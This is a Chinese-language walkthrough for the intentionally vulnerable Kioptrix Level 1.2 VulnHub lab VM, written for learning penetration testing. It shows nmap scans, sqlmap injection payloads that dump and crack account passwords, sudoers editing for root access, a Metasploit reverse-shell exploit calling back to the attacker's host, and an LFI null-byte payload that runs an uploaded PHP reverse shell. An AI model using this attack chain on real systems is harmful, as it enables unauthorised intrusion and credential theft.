vulnhub靶机渗透[KVM3]

名称:Kioptrix: Level 1.2 (#3)
发行日期:2011年4月18日

下载:

  • Download: http://www.kioptrix.com/dlvm/KVM3.rar
  • Download (Mirror): https://download.vulnhub.com/kioptrix/KVM3.rar
  • Download (Torrent): https://download.vulnhub.com/kioptrix/KVM3.rar.torrent

描述:

自上次Kioptrix VM挑战以来已经过去了一段时间。生活不断让您知道这些事情。
在看到最后两个的下载数量之后,以及无数的视频中展示了克服这些挑战的方法。我觉得需要1.2(或者只是3级)。感谢您下载并播放了前两个版本。还要感谢那些花时间为他们制作视频解决方案的人。不胜感激。
与其他两个一样,这一挑战也面向初学者。但是,这是不同的。增加了一些步骤,并且需要新的技能。我仍然必须成为初学者的领域。与其他方法一样,“pown”此方法的方法不止一种。很简单,而不是那么简单。记住……“轻松”或“困难”的感觉总是与自己的技能水平相关的。我从未说过这些事情异常困难或困难,但我们都需要从某个地方入手。让我告诉你,制作这些易受攻击的VM并不像看起来那么容易…
这个挑战很重要。一旦找到IP(DHCP客户端),请编辑主机文件并将其指向kioptrix3.com。
在Windows下,您可以编辑C:\Windows\System32\drivers\etc\hosts,如下所示:

1
2
3
4
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost127.0.0.1 static3.cdn.ubi.com
192.168.1.102 kioptrix3.com

在Linux下,将是/etc/hosts
这里涉及一个网络应用程序,因此要使所有内容都很好并正确显示,您确实需要这样做。
希望您喜欢Kioptrix VM Level 1.2挑战。
Have fun

漏洞:

  • 文件包含
  • 访问控制不当
  • 重用凭证
  • SQL注入
  • 不受限制地上传危险类型的文件
  • 凭证不足

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.84.0/24
Nmap scan report for 192.168.84.144
Host is up (0.00023s latency).
MAC Address: 00:0C:29:44:36:85 (VMware)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
root@kali:~# nmap -A -v -sV -Pn -T4 --script=vuln 192.168.84.144
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:openbsd:openssh:4.7p1:
| CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
| CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
| CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
| CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
|_ CVE-2008-5161 2.6 https://vulners.com/cve/CVE-2008-5161
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.84.144
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.84.144:80/gallery/
| Form id:
| Form action: login.php
|
| Path: http://192.168.84.144:80/index.php?system=Admin
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.84.144:80/gallery/index.php
| Form id:
| Form action: login.php
|
| Path: http://192.168.84.144:80/gallery/gadmin/
| Form id: username
| Form action: index.php?task=signin
|
| Path: http://192.168.84.144:80/index.php?system=Admin&page=loginSubmit
| Form id: contactform
| Form action: index.php?system=Admin&page=loginSubmit
|
| Path: http://192.168.84.144:80/index.php?system=Blog&post=1281005380
| Form id: commentform
|_ Form action:
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /phpmyadmin/: phpMyAdmin
| /cache/: Potentially interesting folder
| /core/: Potentially interesting folder
| /icons/: Potentially interesting folder w/ directory listing
| /modules/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) php/5.2.4-2ubuntu5.6 with suhosin-patch'
|_ /style/: Potentially interesting folder
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection:
| Possible sqli for queries:
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?system=Admin&page=loginSubmit%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
| http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
|_ http://192.168.84.144:80/index.php?page=index%27%20OR%20sqlspider
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| vulners:
| cpe:/a:apache:http_server:2.2.8:
| CVE-2010-0425 10.0 https://vulners.com/cve/CVE-2010-0425
| CVE-2011-3192 7.8 https://vulners.com/cve/CVE-2011-3192
| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
| CVE-2013-2249 7.5 https://vulners.com/cve/CVE-2013-2249
| CVE-2009-1891 7.1 https://vulners.com/cve/CVE-2009-1891
| CVE-2009-1890 7.1 https://vulners.com/cve/CVE-2009-1890
| CVE-2012-0883 6.9 https://vulners.com/cve/CVE-2012-0883
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2013-1862 5.1 https://vulners.com/cve/CVE-2013-1862
| CVE-2014-0231 5.0 https://vulners.com/cve/CVE-2014-0231
| CVE-2014-0098 5.0 https://vulners.com/cve/CVE-2014-0098
| CVE-2013-6438 5.0 https://vulners.com/cve/CVE-2013-6438
| CVE-2011-3368 5.0 https://vulners.com/cve/CVE-2011-3368
| CVE-2010-1452 5.0 https://vulners.com/cve/CVE-2010-1452
| CVE-2010-0408 5.0 https://vulners.com/cve/CVE-2010-0408
| CVE-2009-2699 5.0 https://vulners.com/cve/CVE-2009-2699
| CVE-2008-2364 5.0 https://vulners.com/cve/CVE-2008-2364
| CVE-2007-6750 5.0 https://vulners.com/cve/CVE-2007-6750
| CVE-2009-1195 4.9 https://vulners.com/cve/CVE-2009-1195
| CVE-2012-0031 4.6 https://vulners.com/cve/CVE-2012-0031
| CVE-2011-3607 4.4 https://vulners.com/cve/CVE-2011-3607
| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
| CVE-2013-1896 4.3 https://vulners.com/cve/CVE-2013-1896
| CVE-2012-4558 4.3 https://vulners.com/cve/CVE-2012-4558
| CVE-2012-3499 4.3 https://vulners.com/cve/CVE-2012-3499
| CVE-2012-0053 4.3 https://vulners.com/cve/CVE-2012-0053
| CVE-2011-4317 4.3 https://vulners.com/cve/CVE-2011-4317
| CVE-2011-3639 4.3 https://vulners.com/cve/CVE-2011-3639
| CVE-2011-3348 4.3 https://vulners.com/cve/CVE-2011-3348
| CVE-2011-0419 4.3 https://vulners.com/cve/CVE-2011-0419
| CVE-2010-0434 4.3 https://vulners.com/cve/CVE-2010-0434
| CVE-2008-2939 4.3 https://vulners.com/cve/CVE-2008-2939
| CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
| CVE-2012-2687 2.6 https://vulners.com/cve/CVE-2012-2687
|_ CVE-2011-4415 1.2 https://vulners.com/cve/CVE-2011-4415

发现存在sqli注入和phpmyadmin目录,直接上sqlmap
点击下图所示位置burp抓包之后直接sqlmap跑

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
root@kali:~# sqlmap -r sqlmap.txt 
___
__H__
___ ___[)]_____ ___ ___ {1.3.12#stable}
|_ -| . ['] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:14:33 /2019-12-13/

[04:14:33] [INFO] parsing HTTP request from 'sqlmap.txt'
[04:14:33] [INFO] resuming back-end DBMS 'mysql'
[04:14:33] [INFO] testing connection to the target URL
[04:14:33] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE (SELECT 1341 UNION SELECT 9380) END))&sort=photoid

Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(1324,2762)>(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1324=1324,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM (SELECT 8520 UNION SELECT 1582 UNION SELECT 8916 UNION SELECT 1258)a GROUP BY x)&sort=photoid

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 4741 FROM (SELECT(SLEEP(5)))vtbf)&sort=photoid

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x7171766a71,0x4d67454a425a6e796b5745656b794f584a4348714c79624d4255416243444967494975507875524d,0x7170786a71),NULL,NULL,NULL,NULL,NULL-- TpfQ&sort=photoid

Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1&sort=photoid AND (SELECT 4185 FROM (SELECT(SLEEP(5)))Gmzf)
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: id, type: Unescaped numeric (default)
[1] place: GET, parameter: sort, type: Unescaped numeric
[q] Quit
[04:14:34] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:14:34] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[04:14:34] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] ending @ 04:14:34 /2019-12-13/
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
root@kali:~# sqlmap -r sqlmap.txt -D gallery -T dev_accounts --dump
___
__H__
___ ___[)]_____ ___ ___ {1.3.12#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 04:18:17 /2019-12-13/

[04:18:17] [INFO] parsing HTTP request from 'sqlmap.txt'
[04:18:17] [INFO] resuming back-end DBMS 'mysql'
[04:18:17] [INFO] testing connection to the target URL
[04:18:18] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (5293=5293) THEN 1 ELSE (SELECT 1341 UNION SELECT 9380) END))&sort=photoid

Type: error-based
Title: MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)
Payload: id=1 OR ROW(1324,2762)>(SELECT COUNT(*),CONCAT(0x7171766a71,(SELECT (ELT(1324=1324,1))),0x7170786a71,FLOOR(RAND(0)*2))x FROM (SELECT 8520 UNION SELECT 1582 UNION SELECT 8916 UNION SELECT 1258)a GROUP BY x)&sort=photoid

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 4741 FROM (SELECT(SLEEP(5)))vtbf)&sort=photoid

Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x7171766a71,0x4d67454a425a6e796b5745656b794f584a4348714c79624d4255416243444967494975507875524d,0x7170786a71),NULL,NULL,NULL,NULL,NULL-- TpfQ&sort=photoid

Parameter: sort (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1&sort=photoid AND (SELECT 4185 FROM (SELECT(SLEEP(5)))Gmzf)
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: id, type: Unescaped numeric (default)
[1] place: GET, parameter: sort, type: Unescaped numeric
[q] Quit
[04:18:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:18:18] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[04:18:18] [INFO] used SQL query returns 3 entries
[04:18:19] [INFO] used SQL query returns 3 entries
[04:18:19] [INFO] retrieved: 'id'
[04:18:19] [INFO] retrieved: 'int(10)'
[04:18:19] [INFO] retrieved: 'username'
[04:18:19] [INFO] retrieved: 'varchar(50)'
[04:18:19] [INFO] retrieved: 'password'
[04:18:19] [INFO] retrieved: 'varchar(50)'
[04:18:19] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[04:18:19] [INFO] used SQL query returns 2 entries
[04:18:19] [INFO] retrieved: '1','0d3eccfb887aabd50f243b3f155c0f85','dreg'
[04:18:19] [WARNING] automatically patching output having last char trimmed
[04:18:19] [INFO] retrieved: '2','5badcaf789d3d1d09794d8f021f40f0e','loneferret'
[04:18:19] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[04:18:22] [INFO] writing hashes to a temporary file '/tmp/sqlmapa2cskfzq12456/sqlmaphashes-0oyz7rlz.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[04:18:28] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[04:18:31] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[04:18:34] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[04:18:34] [INFO] starting 4 processes
[04:18:39] [INFO] cracked password 'starwars' for user 'loneferret'
[04:18:40] [INFO] cracked password 'Mast3r' for user 'dreg'
Database: gallery
Table: dev_accounts
[2 entries]
+----+---------------------------------------------+------------+
| id | password | username |
+----+---------------------------------------------+------------+
| 1 | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r) | dreg |
| 2 | 5badcaf789d3d1d09794d8f021f40f0e (starwars) | loneferret |
+----+---------------------------------------------+------------+

[04:18:42] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[04:18:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[04:18:42] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] ending @ 04:18:42 /2019-12-13/

直接用sqlmap跑出账号密码,还省去了将hash拿去解密的麻烦。之后使用这两个密码直接连接ssh即可。

权限提升

ssh连接

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
root@kali:~# ssh loneferret@192.168.84.144
loneferret@192.168.84.144's password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh CompanyPolicy.README
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$ pwd
/home/loneferret
loneferret@Kioptrix3:~$ whoami
loneferret
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht

可以看到当前登录的用户具有xterm-256color文本编辑器的sudo权限。 最初,我们可以尝试编辑/etc/sudoers文件,以便提升特权-为此,我们就开始吧!
如果由于某种原因在尝试运行sudo ht时出现错误,则只需像下面所做的那样将xtrem-color导出为TERM。

1
2
3
4
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers 
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$ export TERM=xterm-color
loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

可以看到这样打开sudoers文件。

从这里按F3,然后输入/etc/sudoers,回车,再下图中的位置输入[, /bin/sh],然后F10选择yes然后保存。

输入下面命令,成功由普通用户变为root用户

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
loneferret@Kioptrix3:~$ sudo /bin/sh
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root)
# pwd
/home/loneferret
# cd /root
# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS:
http://www.lotuscms.org

Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.

至此挑战完成。

更多方法

  • 利用LotusCMS 3.0 eval()远程命令执行漏洞

使用msf中的exploit/multi/http/lcms_php_exec模块可以直接getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root@kali:~# msfdb run
[+] Starting database

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *


=[ metasploit v5.0.63-dev ]
+ -- --=[ 1951 exploits - 1091 auxiliary - 334 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]

msf5 > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > set RHOSTS 192.168.84.144
RHOSTS => 192.168.84.144
msf5 exploit(multi/http/lcms_php_exec) > set payload generic/shell_reverse_tcp
payload => generic/shell_reverse_tcp
msf5 exploit(multi/http/lcms_php_exec) > set LHOST 192.168.84.135
LHOST => 192.168.84.135
msf5 exploit(multi/http/lcms_php_exec) > set URI /
URI => /

msf5 exploit(multi/http/lcms_php_exec) > exploit

[*] Started reverse TCP handler on 192.168.84.135:4444
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 2 opened (192.168.84.135:4444 -> 192.168.84.144:57666) at 2019-12-14 06:18:03 -0500

whoami
www-data

成功getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
ls -la gallery/
total 164
drwxr-xr-x 7 root root 4096 Apr 14 2011 .
drwxr-xr-x 8 root root 4096 Apr 15 2011 ..
drwxr-xr-x 2 root root 4096 Apr 12 2011 BACK
-rw-r--r-- 1 root root 3573 Oct 10 2009 db.sql
-rw-r--r-- 1 root root 252 Apr 12 2011 g.php
drwxr-xr-x 3 root root 4096 Apr 12 2011 gadmin
-rw-r--r-- 1 root root 214 Apr 12 2011 gallery.php
-rw-r--r-- 1 root root 1440 Apr 14 2011 gconfig.php
-rw-r--r-- 1 root root 297 Apr 12 2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12 2011 gfunctions.php
-rw-r--r-- 1 root root 1009 Apr 12 2011 gheader.php
-rw-r--r-- 1 root root 249 Apr 12 2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12 2011 install.BAK
-rw-r--r-- 1 root root 212 Apr 12 2011 login.php
-rw-r--r-- 1 root root 213 Apr 12 2011 logout.php
-rw-r--r-- 1 root root 249 Apr 12 2011 p.php
drwxrwxrwx 2 root root 4096 Apr 12 2011 photos
-rw-r--r-- 1 root root 213 Apr 12 2011 photos.php
-rw-r--r-- 1 root root 219 Apr 12 2011 post_comment.php
-rw-r--r-- 1 root root 214 Apr 12 2011 profile.php
-rw-r--r-- 1 root root 87 Oct 10 2009 readme.html
-rw-r--r-- 1 root root 213 Apr 12 2011 recent.php
-rw-r--r-- 1 root root 215 Apr 12 2011 register.php
drwxr-xr-x 2 root root 4096 Apr 13 2011 scopbin
-rw-r--r-- 1 root root 213 Apr 12 2011 search.php
-rw-r--r-- 1 root root 216 Apr 12 2011 slideshow.php
-rw-r--r-- 1 root root 211 Apr 12 2011 tags.php
drwxr-xr-x 6 root root 4096 Apr 12 2011 themes
-rw-r--r-- 1 root root 56 Oct 10 2009 version.txt
-rw-r--r-- 1 root root 211 Apr 12 2011 vote.php

在gallery目录下发现phpmyadmin配置文件中的phpmyadmin的用户名和密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
cat gallery/gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/

// Installer Details -----------------------------------------------

// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash

$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";

$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";

// Setting Details -------------------------------------------------

if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}

}
}

?>

发现phpmyadmin的用户名密码:root/fuckeyou,直接登录然后getshell

具体参考:phpmyadmin getshell

  • LFI漏洞组合利用
1
http://192.168.84.144/index.php?system=../../../../../../../etc/passwd%00.html

使用之前的sql注入得到admin的密码下图所示登录

将php reverse shell木马后缀改成.jpg上传,然后右键得到图片的链接

浏览器访问

1
192.168.84.144/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/x281lo68jw.jpg%00.html

同时kali端nc监听成功返回shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
connect to [192.168.84.135] from kioptrix3.com [192.168.84.144] 37790
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
15:10:15 up 2:59, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
loneferr pts/0 192.168.84.135 12:27 21:13m 4.66s 0.01s sshd: loneferre
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/
$ whoami
www-data
$

6的一批!!!!!!

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…